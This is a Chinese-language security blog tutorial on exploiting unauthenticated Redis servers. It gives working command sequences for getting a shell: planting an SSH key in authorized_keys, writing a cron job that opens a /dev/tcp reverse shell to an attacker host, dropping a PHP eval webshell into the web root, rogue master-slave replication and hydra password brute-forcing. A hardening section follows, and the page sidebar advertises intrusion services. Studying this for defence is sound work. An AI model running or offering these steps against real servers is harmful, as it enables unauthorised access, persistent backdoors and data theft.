应用介绍
虚的不说了,简单点说就是一个日志型数据库,并有主从同步的功能(优化性能)。
漏洞介绍
默认配置下redis并没有设置密码,被攻击者恶意利用可以导致未授权访问,可以有多种利用方式:服务器权限被获取和数据删除、泄露、加密勒索、植入yam2 minerd 挖矿程序、watch-smartd挖矿木马等
安装redis
docker run -itd --name redis-test -p 6379:6379 redis
常用命令
ping:检测是否连通 且 有权限执行命令
info:读取Redis敏感数据
keys:
NAME | CONTENT |
---|---|
keys * | 读取全部key及其对应的值 |
get <key> | 读取某个key值 |
set <key> | 增加key |
flushall | 删除所有key |
del key | 删除某个key |
config:
NAME | CONTENT |
---|---|
config get dir | 读取备份目录 |
config set dir | 设置备份目录 |
config get dbfilename | 读取备份文件名 |
config set dbfilename | 设置备份文件名 |
slaveof:slaveof <vpsIP> PORT
设置主从关系
未授权getshell
写入公钥
条件:拥有root权限 或 对 /root/.ssh/
目录可写
#vps生成一个公钥 ssh-keygen -t rsa #将公钥写入靶机的key cd /root/.ssh (echo -e "nn"; cat id_rsa.pub; echo -e "nn") > cl4y.txt cat cl4y.txt | redis-cli -h <targetIP> -x set cl4y #-x参数是将管道符之前的内容写入key
config set dir /root/.ssh/#如果没有权限则无法getshell config set dbfilename "authorized_keys" get cl4y save
crontab定时任务反弹shell
条件:对 /var/spool/cron
目录可写
#vps监听一个端口 nc -lvvp 4444
set cl4y "nn*/1 * * * * /bin/bash -i>&/dev/tcp/<vpsIP>/<PORT> 0>&1nn" config set dir /var/spool/cron#如果没有权限则无法getshell config set dbfilename root save
网站写马
条件:已知网站根目录路径 且 目录可写
config set dir /var/www/html set cl4y "nnn<?php @eval($_POST['cl4y']);?>nnn" config set dbfilename webshell.php save
主从复制getshell
条件:这个比较玄学,测试了几台机器,只有一台成功了,咱也不知道为啥,希望师傅们知道的话能跟我说一下。
下载 这个项目然后命令:
#设置主从关系 slaveof <IP> <PORT>
python3 redis-rogue-server.py --rhost <targetIP> -lhost <vpsIP>
利用hydra暴力破解redis的密码
使用hydra工具可以对redis进行暴力破解
hydra -P passwd.txt redis://192.168.152.128
修复方案
ban掉高危命令(重启redis)
#修改 redis.conf 文件,禁用远程修改 DB 文件地址 rename-command FLUSHALL "" rename-command CONFIG "" rename-command EVAL "" #或者通过修改redis.conf文件,改变这些高危命令的名称 rename-command FLUSHALL "name1" rename-command CONFIG "name2" rename-command EVAL "name3"
以低权限运行Redis(重启redis)
链接
Redis 设置密码(重启redis)
修改 redis.conf 文件,添加 requirepass mypassword
禁止外网访问 Redis(重启redis)
修改 redis.conf 文件,添加或修改 bind 127.0.0.1 在redis3.2之后,redis增加了protected-mode,在这个模式下,非绑定IP或者没有配置密码访问时都会报错
修改默认端口
修改配置文件redis.conf文件 Port 6379
保证 authorized_keys 文件的安全
阻止其他用户添加新的公钥。将 authorized_keys 的权限设置为对拥有者只读,其他用户没有任何权限:chmod 400 ~/.ssh/authorized_keys为保证 authorized_keys 的权限不会被改掉,您还需要设置该文件的 immutable 位权限:chattr +i ~/.ssh/authorized_keys然而,用户还可以重命名 ~/.ssh,然后新建新的 ~/.ssh 目录和 authorized_keys 文件。要避免这种情况,需要设置 ~./ssh 的 immutable 权限:chattr +i ~/.ssh
设置防火墙策略
如果正常业务中Redis服务需要被其他服务器来访问,可以设置iptables策略仅允许指定的IP来访问Redis服务。
猜你还喜欢
- 07-08八年专业安全团队承接渗透入侵维护服务
- 08-06SQLMAP的注入命令以及使用方法
- 08-03白帽故事汇:网络安全战士从来不是「男生」的专利
- 07-27编辑器漏洞手册
- 07-12web安全之如何全面发现系统后台
- 02-22常见Web源码泄露总结
- 07-25网站后台登陆万能密码
- 07-23破解emlog收费模板“Begin”
- 01-12批量检测SQL注入
- 01-22Apache Solr远程代码执行漏洞(CVE-2017-12629)从利用到入侵检测
- 随机文章
-
- 批量S2-045漏洞检测及利用
- Docker出漏洞:端口2375【附案例】
- 渗透Hacking Team过程
- 浅谈高级组合技打造“完美” 捆绑后门
- 某司SSL-VPN沙盒逃逸之旅
- Mimikatz 非官方指南和命令参考_Part1
- Microsoft Outlook 漏洞:可允许远程代码执行
- 从TCL某漏洞看内网渗透教学分享之内网信息探测和后渗透准备
- 域渗透的金之钥匙
- 巧用DSRM密码同步将域控权限持久化
- Hash传递攻击Windows2012远程桌面
- 为指定用户添加Windows特权的代码
- 别以为有vpn我找不到你(网警抓人全过程)
- 内网渗透:利用WMI代替psexec(WMIEXEC.vbs)
- 域科普文:使用powershell管理域用户
- 详解Filezilla提权
- 适用于PHP初学者的学习线路和建议
- PHP开发规范
- 如何绕过安全狗waf这类的防护软件--PHP过狗一句话实例两枚+过狗详细分析讲解
- 漏洞挖掘经验分享
- 热门文章
-
- 八年专业安全团队承接渗透入侵维护服务
- Emlog黑客站模板“Milw0rm”发布
- Stuxnet纪录片-零日 Zero.Days (2016)【中文字幕】
- SQLMAP的注入命令以及使用方法
- 白帽故事汇:网络安全战士从来不是「男生」的专利
- 编辑器漏洞手册
- web安全之如何全面发现系统后台
- 常见Web源码泄露总结
- 渗透测试培训(第五期)
- 深入理解JAVA反序列化漏洞
- cmseasy前台无需登录直接获取敏感数据的SQL注入(有POC证明)
- 网站后台登陆万能密码
- 黑麒麟2016渗透培训系列教程
- 破解emlog收费模板“Begin”
- 那些强悍的PHP一句话后门
- Android平台渗透测试套件zANTI v2.5发布(含详细说明)
- 渗透工具BackTrack与KaliLinux全套视频教程
- Python列为黑客应该学的四种编程语言之一 初学者该怎么学
- CVE-2017-11882漏洞复现和利用
- 恶意程序报告在线查询工具
文章存档
- 2021年3月(4)
- 2020年12月(4)
- 2020年11月(5)
- 2020年10月(8)
- 2020年9月(8)
- 2020年8月(20)
- 2020年7月(47)
- 2020年6月(70)
- 2020年5月(41)
- 2020年4月(21)
- 2020年3月(120)
- 2020年2月(26)
- 2019年12月(12)
- 2019年11月(13)
- 2019年10月(17)
- 2019年9月(15)
- 2019年8月(13)
- 2019年7月(15)
- 2019年6月(15)
- 2019年5月(19)
- 2019年4月(23)
- 2019年3月(19)
- 2019年2月(11)
- 2019年1月(29)
- 2018年12月(24)
- 2018年11月(56)
- 2018年10月(79)
- 2018年9月(20)
- 2018年8月(17)
- 2018年7月(16)
- 2018年6月(7)
- 2018年5月(10)
- 2018年3月(6)
- 2018年2月(2)
- 2018年1月(11)
- 2017年11月(18)
- 2017年10月(6)
- 2017年9月(8)
- 2017年8月(7)
- 2017年7月(7)
- 2017年6月(15)
- 2017年5月(30)
- 2017年4月(7)
- 2017年3月(1)
- 2017年2月(4)
- 2017年1月(1)
- 2016年12月(3)
- 2016年11月(7)
- 2016年10月(6)
- 2016年9月(6)
- 2016年8月(102)
- 2016年7月(24)
- 2013年7月(1)
- 文章标签
-